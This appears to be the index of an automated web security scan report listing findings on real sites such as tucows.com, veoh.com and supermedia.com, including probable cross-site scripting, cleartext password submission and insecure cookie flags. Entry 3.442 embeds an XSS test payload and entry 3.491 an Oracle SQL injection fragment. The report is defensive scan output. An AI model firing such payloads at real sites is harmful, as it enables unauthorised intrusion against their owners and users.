3.325. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 2]

3.326. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 3]

3.327. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]

3.328. http://www.tucows.com/images/newassets/search.html [REST URL parameter 1]

3.329. http://www.tucows.com/images/newassets/search.html [REST URL parameter 2]

3.330. http://www.tucows.com/images/newassets/search.html [REST URL parameter 3]

3.331. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]

3.332. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 1]

3.333. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 2]

3.334. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 3]

3.335. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]

3.336. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 1]

3.337. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 2]

3.338. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 3]

3.339. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]

3.340. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

3.341. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

3.342. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

3.343. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

3.344. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

3.345. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 1]

3.346. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 2]

3.347. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 3]

3.348. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

3.349. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

3.350. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

3.351. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

3.352. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

3.353. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

3.354. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 1]

3.355. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 2]

3.356. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 3]

3.357. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 1]

3.358. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 2]

3.359. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 3]

3.360. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

3.361. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

3.362. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

3.363. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]

3.364. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]

3.365. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]

3.366. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

3.367. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

3.368. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

3.369. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

3.370. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

3.371. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

3.372. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

3.373. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

3.374. http://www.tucows.com/index.html [REST URL parameter 1]

3.375. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]

3.376. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]

3.377. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]

3.378. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

3.379. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

3.380. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]

3.381. http://www.tucows.com/privacy.html [REST URL parameter 1]

3.382. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]

3.383. http://www.tucows.com/sitemap.html [REST URL parameter 1]

3.384. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]

3.385. http://www.tucows.com/software.html [REST URL parameter 1]

3.386. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]

3.387. http://www.tucows.com/software.html [pf parameter]

3.388. http://www.tucows.com/software.html [t parameter]

3.389. http://www.tucows.com/terms.html [REST URL parameter 1]

3.390. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]

3.391. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]

3.392. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]

3.393. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

3.394. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

3.395. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

3.396. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

3.397. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]

3.398. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

3.399. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

3.400. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]

3.401. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

3.402. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

3.403. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]

3.404. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

3.405. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

3.406. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]

3.407. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

3.408. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

3.409. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]

3.410. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

3.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

3.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]

3.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

3.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

3.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]

3.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

3.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

3.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]

3.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

3.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

3.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]

3.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

3.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

3.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]

3.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

3.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

3.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]

3.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

3.429. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

3.430. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]

3.431. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

3.432. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

3.433. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]

3.434. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

3.435. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

3.436. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]

3.437. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]

3.438. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

3.439. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

3.440. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

3.441. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

3.442. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]

3.443. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

3.444. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

3.445. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]

3.446. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

3.447. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

3.448. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]

3.449. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

3.450. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

3.451. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]

3.452. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

3.453. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

3.454. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]

3.455. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

3.456. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

3.457. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]

3.458. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]

3.459. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]

3.460. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]

3.461. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]

3.462. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]

3.463. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]

3.464. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]

3.465. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

3.466. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

3.467. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

3.468. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

3.469. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

3.470. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

3.471. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

3.472. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

3.473. http://www.quantcast.com/p-aasG6JkxVvmNA [Referer HTTP header]

3.474. http://www.supermedia.com/community/blog [Referer HTTP header]

3.475. http://www.supermedia.com/crossdomain.xml [Referer HTTP header]

3.476. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

3.477. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

3.478. http://www.supermedia.com/support/help/ [Referer HTTP header]

3.479. http://www.supermedia.com/yellow-pages/ [Referer HTTP header]

3.480. https://www.supermedia.com/ [Referer HTTP header]

3.481. https://www.supermedia.com/signin [Referer HTTP header]

3.482. https://www.supermedia.com/spportal/ [Referer HTTP header]

3.483. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

3.484. https://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

3.485. https://www.supermedia.com/spportal/login.do [Referer HTTP header]

3.486. https://www.supermedia.com/spportal/myaccount.do [Referer HTTP header]

3.487. https://www.supermedia.com/spportal/spportalFlow [Referer HTTP header]

3.488. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

3.489. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

3.490. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

3.491. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [Referer HTTP header]

3.492. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]

3.493. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]

4. Flash cross-domain policy

4.1. http://2e76.v.fwmrm.net/crossdomain.xml

4.2. http://adserver.adtechus.com/crossdomain.xml

4.3. http://app.scanscout.com/crossdomain.xml

4.4. http://audience.visiblemeasures.com/crossdomain.xml

4.5. http://beacon.securestudies.com/crossdomain.xml

4.6. http://bp.specificclick.net/crossdomain.xml

4.7. http://c.brightcove.com/crossdomain.xml

4.8. http://cdn.gigya.com/crossdomain.xml

4.9. http://col.stc.s-msn.com/crossdomain.xml

4.10. http://dev.virtualearth.net/crossdomain.xml

4.11. http://gscounters.gigya.com/crossdomain.xml

4.12. http://ll.static.abc.com/crossdomain.xml

4.13. http://superpages.122.2o7.net/crossdomain.xml

4.14. http://uat.netmng.com/crossdomain.xml

4.15. http://a.abc.com/crossdomain.xml

4.16. http://adadvisor.net/crossdomain.xml

4.17. http://ak1.ostkcdn.com/crossdomain.xml

4.18. http://ak2.ostkcdn.com/crossdomain.xml

4.19. http://googleads.g.doubleclick.net/crossdomain.xml

4.20. http://www.apple.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://dev.virtualearth.net/clientaccesspolicy.xml

5.2. http://superpages.122.2o7.net/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://advertise.tucows.com/

6.2. http://advertise.tucows.com/

6.3. http://boardreader.com/my.html

6.4. http://digg.com/submit

6.5. http://forums.digitalpoint.com/showthread.php

6.6. http://www.butterscotch.com/

6.7. http://www.butterscotch.com/

6.8. http://www.butterscotch.com/tutorials.html

6.9. http://www.butterscotch.com/tutorials.html

6.10. http://www.ericmmartin.com/projects/simplemodal/

6.11. http://www.facebook.com/

6.12. http://www.made-in-china.com/

6.13. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/

6.14. http://www.supermedia.com/

6.15. http://www.supertradeexchange.com/

6.16. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22

6.17. http://www.thumbshots.com/Firefox.aspx

6.18. http://www.tucows.com/

6.19. http://www.tucows.com/

6.20. http://www.tucows.com/about.html

6.21. http://www.tucows.com/about.html

6.22. http://www.tucows.com/advertise.html

6.23. http://www.tucows.com/advertise.html

6.24. http://www.tucows.com/affiliate/index.html

6.25. http://www.tucows.com/affiliate/index.html

6.26. http://www.tucows.com/author_ratings.html

6.27. http://www.tucows.com/author_ratings.html

6.28. http://www.tucows.com/contact.html

6.29. http://www.tucows.com/contact.html

6.30. http://www.tucows.com/images/newassets/contact.html

6.31. http://www.tucows.com/images/newassets/contact.html

6.32. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

6.33. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

6.34. http://www.tucows.com/images/newassets/includes/js/aalib.js

6.35. http://www.tucows.com/images/newassets/includes/js/aalib.js

6.36. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

6.37. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

6.38. http://www.tucows.com/images/newassets/includes/js/show_layer.js

6.39. http://www.tucows.com/images/newassets/includes/js/show_layer.js

6.40. http://www.tucows.com/images/newassets/includes/js/signupin.js

6.41. http://www.tucows.com/images/newassets/includes/js/signupin.js

6.42. http://www.tucows.com/images/newassets/includes/js/x_core.js

6.43. http://www.tucows.com/images/newassets/includes/js/x_core.js

6.44. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

6.45. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

6.46. http://www.tucows.com/images/newassets/includes/js/yetii.js

6.47. http://www.tucows.com/images/newassets/includes/js/yetii.js

6.48. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

6.49. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

6.50. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

6.51. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

6.52. http://www.tucows.com/images/newassets/javascript:void(null)

6.53. http://www.tucows.com/images/newassets/javascript:void(null)

6.54. http://www.tucows.com/images/newassets/lostpass.html

6.55. http://www.tucows.com/images/newassets/lostpass.html

6.56. http://www.tucows.com/images/newassets/privacy.html

6.57. http://www.tucows.com/images/newassets/privacy.html

6.58. http://www.tucows.com/images/newassets/safesearchtoggle.html

6.59. http://www.tucows.com/images/newassets/safesearchtoggle.html

6.60. http://www.tucows.com/images/newassets/search.html

6.61. http://www.tucows.com/images/newassets/search.html

6.62. http://www.tucows.com/images/newassets/sitemap.html

6.63. http://www.tucows.com/images/newassets/sitemap.html

6.64. http://www.tucows.com/images/newassets/terms.html

6.65. http://www.tucows.com/images/newassets/terms.html

6.66. http://www.tucows.com/images/newassets/warningcow200.png

6.67. http://www.tucows.com/images/newassets/warningcow200.png

6.68. http://www.tucows.com/index.html

6.69. http://www.tucows.com/index.html

6.70. http://www.tucows.com/preview/194850/x22

6.71. http://www.tucows.com/preview/194850/x22

6.72. http://www.tucows.com/privacy.html

6.73. http://www.tucows.com/privacy.html

6.74. http://www.tucows.com/sitemap.html

6.75. http://www.tucows.com/sitemap.html

6.76. http://www.tucows.com/software.html

6.77. http://www.tucows.com/software.html

6.78. http://www.tucows.com/terms.html

6.79. http://www.tucows.com/terms.html

6.80. http://www.veoh.com/favorites

6.81. http://www.veoh.com/login

6.82. http://www.veoh.com/messages/inbox

6.83. http://www.veoh.com/myinterests

6.84. http://www.veoh.com/myplaylists

6.85. http://www.veoh.com/myprofile/videos

6.86. http://www.veoh.com/publish/video

6.87. http://www.veoh.com/register

7. SQL statement in request parameter

8. SSL cookie without secure flag set

8.1. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat

8.2. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

8.3. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

8.4. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

8.5. https://store.apple.com/us/sentryx/sign_in

8.6. https://www.smartdevil.com/

8.7. https://www.smartdevil.com/Home.aspx

8.8. https://www.smartdevil.com/SSLLogin.aspx

8.9. https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx

8.10. https://www.smartdevil.com/SSLLogin/tabid/116/ctl/SendPassword/Default.aspx

8.11. https://www.smartdevil.com/privacy.aspx

8.12. https://www.smartdevil.com/terms.aspx

8.13. https://www.supermedia.com/spportal/spportalFlow.do

8.14. https://www.supermedia.com/spportal/spportalFlow.do

8.15. https://www.thumbshots.com/Products/ThumbshotsImages/IntegrationCode.aspx

9. Session token in URL

9.1. http://clicktoverify.truste.com/images/watch_btn3.png

9.2. http://clicktoverify.truste.com/pvr.php

9.3. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

9.4. http://my.supermedia.com/directoryoptout/

9.5. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22

9.6. http://storechat.apple.com/hc/6964264/

9.7. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

9.8. http://www.amazon.com/s/

9.9. http://www.blogger.com/comment-iframe.g

9.10. http://www.linkedin.com/in/troyd/x22

9.11. https://www.supermedia.com/spportal/myaccount.do

9.12. http://www.veoh.com/webplayed.xml

10. Password field submitted using GET method

10.1. http://digg.com/submit

10.2. http://www.butterscotch.com/

10.3. http://www.butterscotch.com/

10.4. http://www.butterscotch.com/tutorials.html

10.5. http://www.butterscotch.com/tutorials.html

11. Open redirection

12. Cookie scoped to parent domain

12.1. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

12.2. http://www.amazon.com/s/

12.3. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22

12.4. http://www.manta.com/c/mm8136k/abc-development-inc/x22

12.5. http://www.myspace.com/Modules/PostTo/Pages/

12.6. http://www.opensource.org/licenses/mit-license.php

12.7. http://www.overstock.com/productxml/

12.8. http://www.stumbleupon.com/submit

12.9. http://www.veoh.com/webplayed.xml

12.10. http://102.xg4ken.com/media/redir.php

12.11. http://2e76.v.fwmrm.net/ad/l/1

12.12. http://2e76.v.fwmrm.net/ad/p/1

12.13. http://abcnews.go.com/Sports/wireStory

12.14. http://ad.doubleclick.net/ad/N3671.msnmidfunnel.com/B5159652.21

12.15. http://ad.doubleclick.net/ad/N6421.152847.MSN.COM/B5094800.20

12.16. http://ad.trafficmp.com/a/bpix

12.17. http://ad.trafficmp.com/a/bpix

12.18. http://ad.trafficmp.com/a/bpix

12.19. http://ad.trafficmp.com/a/js

12.20. http://ad.trafficmp.com/a/js

12.21. http://ad.trafficmp.com/a/js

12.22. http://ad.trafficmp.com/a/js

12.23. http://ad.trafficmp.com/a/js

12.24. http://ad.trafficmp.com/a/js

12.25. http://ad.trafficmp.com/a/js

12.26. http://ad.trafficmp.com/a/js

12.27. http://ads.adap.tv/beacons

12.28. http://ads.adap.tv/cookie

12.29. http://ads.adap.tv/favicon.ico

12.30. https://adwords.google.com/select/Login

12.31. http://app.scanscout.com/ssframework/adStreamJSController.htm

12.32. http://app.scanscout.com/ssframework/adStreamJSController.xml

12.33. http://ar.voicefive.com/bmx3/broker.pli

12.34. http://audience.visiblemeasures.com/u/getuid/

12.35. http://audience.visiblemeasures.com/u/getuid/

12.36. http://b.scorecardresearch.com/b

12.37. http://b.scorecardresearch.com/p

12.38. http://blogsearch.google.com/

12.39. http://books.google.com/bkshp

12.40. http://books.google.com/books

12.41. http://bp.specificclick.net/

12.42. http://buzz.yahoo.com/buzz

12.43. http://c.redcated/c.gif

12.44. http://clk.redcated/AVE/go/285974183/direct

12.45. http://clk.redcated/AVE/go/286182932/direct/01/]]

12.46. http://code.google.com/p/simplemodal/

12.47. http://code.google.com/p/swfobject/

12.48. http://core.insightexpressai.com/adServer/adServerESI.aspx

12.49. http://developer.yahoo.com/yui/

12.50. http://developer.yahoo.com/yui/license.html

12.51. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json

12.52. http://dt.scanscout.com/ssframework/dt/pt.png

12.53. http://edge.quantserve.com/quant.js

12.54. http://forums.digitalpoint.com/showthread.php

12.55. http://googleads.g.doubleclick.net/pagead/ads

12.56. http://googleads.g.doubleclick.net/pagead/ads

12.57. http://groups.google.com/grphp

12.58. http://hit.clickaider.com/clickaider.js

12.59. http://hit.clickaider.com/pv

12.60. http://id.google.com/verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif

12.61. http://id.google.com/verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif

12.62. http://id.google.com/verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif

12.63. http://l0.scanscout.com/ssframework/log/log.png

12.64. http://l0.scanscout.com/ssframework/logController.xml

12.65. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat

12.66. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat

12.67. http://load.exelator.com/load/

12.68. http://maps.google.com/maps

12.69. http://maps.google.com/maps/stk/lc

12.70. http://maps.google.com/maps/vp

12.71. http://news.google.com/nwshp

12.72. https://picasaweb.google.com/home

12.73. https://picasaweb.google.com/lh/view

12.74. http://pixel.quantserve.com/api/segments.json

12.75. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22

12.76. http://scholar.google.com/schhp

12.77. http://scholar.google.com/scholar

12.78. http://shopping.yahoo.com/search

12.79. http://solutions.liveperson.com/ref/lppb.asp

12.80. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

12.81. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389

12.82. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075

12.83. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156

12.84. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604

12.85. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958

12.86. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617

12.87. http://tags.bluekai.com/site/2174

12.88. http://tags.bluekai.com/site/2491

12.89. http://tags.bluekai.com/site/353

12.90. http://tags.bluekai.com/site/365

12.91. http://translate.google.com/

12.92. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/

12.93. http://uat.netmng.com/pixel/

12.94. http://video.google.com/

12.95. http://w.ic.tynt.com/b/o

12.96. http://www.blogger.com/comment-iframe.g

12.97. http://www.facebook.com/

12.98. http://www.facebook.com/2008/fbml

12.99. http://www.facebook.com/campaign/landing.php

12.100. http://www.facebook.com/home.php

12.101. http://www.facebook.com/pages/Veoh/129836657035793

12.102. http://www.facebook.com/share.php

12.103. http://www.facebook.com/supermediacom

12.104. http://www.flickr.com/search/

12.105. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863

12.106. http://www.linkchina.com/wholesale/golf-clubs.html

12.107. http://www.linkedin.com/in/troyd/x22

12.108. http://www.linkedin.com/pub/troy-brown/07/287/56A/x22

12.109. http://www.linkedin.com/shareArticle

12.110. http://www.made-in-china.com/

12.111. http://www.msn.com/

12.112. http://www.mybloglog.com/buzz/members/smartdesis/x22

12.113. http://www.switchboard.com/

12.114. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

12.115. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

12.116. http://www.wix.com/

12.117. http://www.youtube.com/

12.118. http://www.youtube.com/results

12.119. http://www.youtube.com/watch

13. Cookie without HttpOnly flag set

13.1. http://abcconstructioninc.com/x22

13.2. http://advertise.tucows.com/

13.3. http://comcast.usdirect.com/

13.4. http://discussions.apple.com/category.jspa

13.5. http://ir.supermedia.com/

13.6. http://ir.supermedia.com/InvestorKit.cfm

13.7. http://ir.supermedia.com/common/mobile/

13.8. http://ir.supermedia.com/contactus.cfm

13.9. http://ir.supermedia.com/disclaimer.cfm

13.10. http://ir.supermedia.com/downloads.cfm

13.11. http://ir.supermedia.com/eventdetail.cfm

13.12. http://ir.supermedia.com/events.cfm

13.13. http://ir.supermedia.com/faq.cfm

13.14. http://ir.supermedia.com/index.cfm

13.15. http://ir.supermedia.com/releasedetail.cfm

13.16. http://ir.supermedia.com/releases.cfm

13.17. http://ir.supermedia.com/results.cfm

13.18. http://ir.supermedia.com/rss.cfm

13.19. http://ir.supermedia.com/search.cfm

13.20. http://ir.supermedia.com/sec.cfm

13.21. http://ir.supermedia.com/stockquote.cfm

13.22. http://l0.scanscout.com/ssframework/logController.xml

13.23. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat

